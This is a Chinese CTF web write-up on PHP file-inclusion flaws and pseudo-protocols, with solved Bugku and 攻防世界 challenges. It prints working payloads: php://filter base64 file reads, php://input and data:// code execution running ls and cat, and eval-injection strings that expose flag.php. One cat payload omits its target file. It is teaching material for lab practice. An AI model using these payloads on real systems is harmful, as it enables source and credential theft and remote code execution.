CTF-WEB:PHP 伪协议
<p></p><div class="toc"><div class="toc-container-header">目录</div><ul><li>文件包含漏洞<ul><li>文件包含函数</li><li>包含漏洞分类<ul><li>本地包含</li><li>远程包含</li></ul></li></ul></li><li>伪协议<ul><li>PHP 伪协议</li><li>使用样例</li><li>data 伪协议</li></ul></li><li>例题:bugku-本地包含</li><li>例题:bugku-flag 在 index 里</li><li>例题:bugku-welcome to bugkuctf</li><li>例题:攻防世界-Web_php_include</li><li>参考资料</li></ul></div><p></p><h1 id="文件包含漏洞">文件包含漏洞</h1>
<p>为了更好地使用代码的重用性,可以使用文件包含函数将文件包含进来,直接使用文件中的代码来提高重用性。但是这也产生了<strong>文件包含漏洞</strong>,产生原因是在通过 PHP 的函数引入文件时,为了灵活包含文件会将被包含文件设置为变量,通过动态变量来引入需要包含的文件。此时用户可以对变量的值可控,而服务器端未对变量值进行合理地校验或者校验被绕过,就会导致文件包含漏洞。</p>
<h2 id="文件包含函数">文件包含函数</h2>
<table>
<thead>
<tr>
<th>函数</th>
<th>功能</th>
</tr>
</thead>
<tbody>
<tr>
<td>include()</td>
<td>代码执行到 include() 函数时将文件包含</td>
</tr>
<tr>
<td>include_once()</td>
<td>当重复调用同一文件时只调用一次,功能与 include() 相同</td>
</tr>
<tr>
<td>require()</td>
<td>require() 执行如果发生错误,函数会报错并终止脚本</td>
</tr>
<tr>
<td>require_once()</td>
<td>当重复调用同一文件时只调用一次,功能与 require() 相同</td>
</tr>
</tbody>
</table>
<h2 id="包含漏洞分类">包含漏洞分类</h2>
<h3 id="本地包含">本地包含</h3>
<p>当包含的文件在服务器本地时,就形成了本地文件包含。文件包含可以包含任意文件,被包含的文件可以不是 PHP 代码,可以是文本或图片等。只要文件被包含就会被服务器脚本语言执行,如果包含的文件内容不符合 php 语法,会直接将文件内容输出。例如下面这段简易的代码:</p>
<pre><code><?php
$file = $_GET['file'];
include($file);
?>
</code></pre>
<h3 id="远程包含">远程包含</h3>
<p>当包含的文件在远程服务器上时,就形成了远程文件包含。所包含远程服务器的文件后缀不能与目标服务器语言相同,远程文件包含需要在 php.ini 中设置:</p>
<pre><code>allow_url_include = on(是否允许 include/require 远程文件)
allow_url_fopen = on(是否允许打开远程文件)
</code></pre>
<h1 id="伪协议">伪协议</h1>
<h2 id="php-伪协议">PHP 伪协议</h2>
<p><strong>PHP 伪协议</strong>是 PHP 支持的协议与封装协议,几个 PHP 支持的伪协议如下。</p>
<table>
<thead>
<tr>
<th>伪协议</th>
<th>功能</th>
</tr>
</thead>
<tbody>
<tr>
<td>file://</td>
<td>访问本地文件系统</td>
</tr>
<tr>
<td>http://</td>
<td>访问 HTTP(s) 网址</td>
</tr>
<tr>
<td>php://</td>
<td>访问各个输入/输出流</td>
</tr>
<tr>
<td>phar://</td>
<td>PHP 归档</td>
</tr>
<tr>
<td>zip://</td>
<td>压缩流</td>
</tr>
</tbody>
</table>
<p>例如在 allow_url_include = on 时服务器上有个文件叫 index.php,且存在文件包含漏洞,这个时候就能用 php 伪协议直接把文件显示出来。</p>
<pre><code>?file=php://filter/read=convert.base64-encode/resource=index.php
</code></pre>
<p>稍微解释下这个做法,<strong>php://filter/</strong> 是一种访问本地文件的协议,/read=convert.base64-encode/ 表示读取的方式是 base64 编码后,resource=index.php 表示目标文件为index.php。问什么要进行 base64 编码呢?如果不进行 base64 编码传入,index.php 就会直接执行,我们就看不到文件中的内容了。<br>
php 协议还常用 <strong>php://input</strong>,这可以访问请求的原始数据的只读流,可以读取 POST 请求的参数。</p>
<h2 id="使用样例">使用样例</h2>
<p>假设一个测试页面该页面存在文件包含漏洞,且网站内部有密码的备份文件,尝试获取密码。在 index.php 页面下有个 file 参数用于接收要包含的文件,设置之为 php://input 伪协议,用 post 传递要执行的 php 代码。系统执行 ls 命令遍历目录,看到当前目录下有 2 个 php 文件。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109110826049-1930670555.png" alt="" loading="lazy"><br>
显然密码文件不在这里,执行 pwd 命令查看当前的目录,看到这里距离站点根目录还有好几层。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109111003623-9766141.png" alt="" loading="lazy"><br>
使用“ls ..”遍历上一级目录,看到一张图片和 2 个网站的目录。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109111017531-718601235.png" alt="" loading="lazy"><br>
使用“ls ../..”遍历上一级的上一级目录,看到文件“mima”,此地无银三百两。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109111025703-495441337.png" alt="" loading="lazy"><br>
使用 php://filter 伪协议查看该文件,base64 解码后得到想要的东西。</p>
<pre><code>?file=php://filter/read=convert.base64-encode/resource=../../mima
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109111045613-572837153.png" alt="" loading="lazy"><br>
<img src="https://img2020.cnblogs.com/blog/1774310/202201/1774310-20220109111048122-703549695.png" alt="" loading="lazy"></p>
<h2 id="data-伪协议">data 伪协议</h2>
<p>php 5.2.0 起,数据流封装器开始有效,主要用于数据流的读取,如果传入的数据是PHP代码就会执行代码。使用方法为:</p>
<pre><code>data://text/plain;base64,xxxx(base64编码后的数据)
</code></pre>
<h1 id="例题bugku-本地包含">例题:bugku-本地包含</h1>
<p>题目的源码如下,观察到代码将提取一个 REQUEST 变量,这个变量时 HTTP Request 变量,默认情况下包含了 GET、POST 和 COOKIE 的数组。</p>
<pre><code><?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval("var_dump($a);"); //var_dump() 函数可以输出变量的类型和值
show_source(__FILE__);
?>
</code></pre>
<p>第一种解法是利用 eval() 函数,它把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码且必须以分号结尾。这里 eval() 会把变量 a 中的内容提取出来,然后执行 var_dump() 函数输出。不过由于变量 a 来自于变量 hello 变量,而如果 hello 变量中的内容是代码,也会被执行。所以这里可以传入一句代码来直接显示 flag.php,例如:</p>
<pre><code>hello=);show_source(%27flag.php%27
</code></pre>
<p>则在 eval 中,就会把上述 hello 的值替换掉变量 a,等同于执行如下代码:</p>
<pre><code>var_dump();
show_source('flag.php');
</code></pre>
<p>同理,使用其他的函数显示文件也是可以的,注意使用 “);” 来构造。</p>
<pre><code>hello=);print_r(file("flag.php")
hello=);var_dump(file("flag.php")
hello=);include(@$_POST['b']
</code></pre>
<p>第二种解法就是用 PHP 伪协议把 flag.php 文件读出来,然后再使用 include() 函数包含出来。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202008/1774310-20200820150056955-1590708310.png" alt="" loading="lazy"><br>
当然还有第 3 种解法,就是直接把 flag.php 导入到 hello 变量中。</p>
<h1 id="例题bugku-flag-在-index-里">例题:bugku-flag 在 index 里</h1>
<p>打开网页,点击后观察 url 有个文件包含漏洞,也就是说我们可以想办法把包含 flag 的文件导出来。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202008/1774310-20200820152049085-1850774031.png" alt="" loading="lazy"><br>
根据提示 flag 在 index.php 里,使用 php 伪协议把文件内容的 base64 编码导出,解码得到 flag。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202008/1774310-20200820152315358-1041267491.png" alt="" loading="lazy"></p>
<h1 id="例题bugku-welcome-to-bugkuctf">例题:bugku-welcome to bugkuctf</h1>
<p>打开网页查看源码如下,源码要求用 GET 方式传递三个参数,其中 user 不为空,并且作为文件名变量打开后的文件内容为 “welcome to the bugkuctf”,file 要求值为 hint.php。</p>
<pre><code><!--
$user = $_GET["txt"];
$file = $_GET["file"];
$pass = $_GET["password"];
if(isset($user)&&(file_get_contents($user,'r')==="welcome to the bugkuctf")){
echo "hello admin!<br>";
include($file); //hint.php
}
else{
echo "you are not admin ! ";
}
-->
</code></pre>
<p>对于变量 user,当传进去的变量的参数作为文件名变量去打开时,可用 php://input 作为参数,同时使用 post 方式传入内容作为变量的文件内容。对于 file 变量,可以使用伪协议 php://filter 来读取 hint.php 文件。构造出的 payload 为:</p>
<pre><code>index.php?txt=php://input&file=php://filter/read=convert.base64-encode/resource=hint.php&password=
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1774310/202008/1774310-20200820154333148-461724009.png" alt="" loading="lazy"><br>
此时就得到了 hint.php 的源码的 base64 编码,解码后得到:</p>
<pre><code><?php
class Flag{//flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("good");
}
}
}
?>
</code></pre>
<p>接下来的内容关于 PHP 反序列化,可以前往博客CTF-WEB:PHP 反序列化查看剩余步骤。</p>
<h1 id="例题攻防世界-web_php_include">例题:攻防世界-Web_php_include</h1>
<p>打开网页,看到一段 PHP 代码如下,观察到这段代码有 include() 函数,因此这题要考虑文件包含漏洞。<strong>strstr() 函数</strong>查找字符串首次出现的位置,然后返回字符串剩余部分。注意到这段代码使用了 strstr() 函数将传入参数中的 “php://” 全部删了,也就是说此处无法直接使用 PHP 伪协议来完成。</p>
<pre><code><?php
show_source(__FILE__);
echo $_GET['hello'];
$page=$_GET['page'];
while (strstr($page, "php://")) {
$page=str_replace("php://", "", $page);
}
include($page);
?>
</code></pre>
<p>注意到这里还传递了一个参数 “hello”,我们尝试传一个参数进去,发现这个参数被回显回了网页。因此我们考虑以命令执行,然后命令执行的结果回显到浏览器,例如用 ls、cat 命令来查看。<br>
<img src="https://img2020.cnblogs.com/blog/1774310/202009/1774310-20200901210831373-1280597631.png" alt="" loading="lazy"><br>
这里可以改用 data 伪协议来做,首先我们还是要先知道 flag 放在哪里,写出如下代码,则网页就会执行 ls 命令输出目录下的文件名。</p>
<pre><code><?php system("ls")?>
</code></pre>
<p>根据 data 伪协议的使用方法,我们需要把上述代码用 base64 编码然后传入:</p>
<pre><code>?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJscyIpPz4=
</code></pre>
<p><img src="https://img2020.cnblogs.com/blog/1774310/202009/1774310-20200901205306791-1622509107.png" alt="" loading="lazy"><br>
接下来就要查看 “fl4gisisish3r3.php” 这个文件的内容了,还是一样写出下面代码让网页执行 cat 命令查看文件。</p>
<pre><code><?php system("cat")?>
</code></pre>
<p>还是一样把上述代码用 base64 编码然后传入,然后打开 F12 查看源码就能看到 flag。</p>
<pre><code>?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJjYXQiKT8+
</code></pre>
<h1 id="参考资料">参考资料</h1>
<p>文件包含漏洞学习总结<br>
Web安全实战系列:文件包含漏洞<br>
PHP伪协议总结</p><br><br>
来源:https://www.cnblogs.com/linfangnan/p/13535097.html
頁:
[1]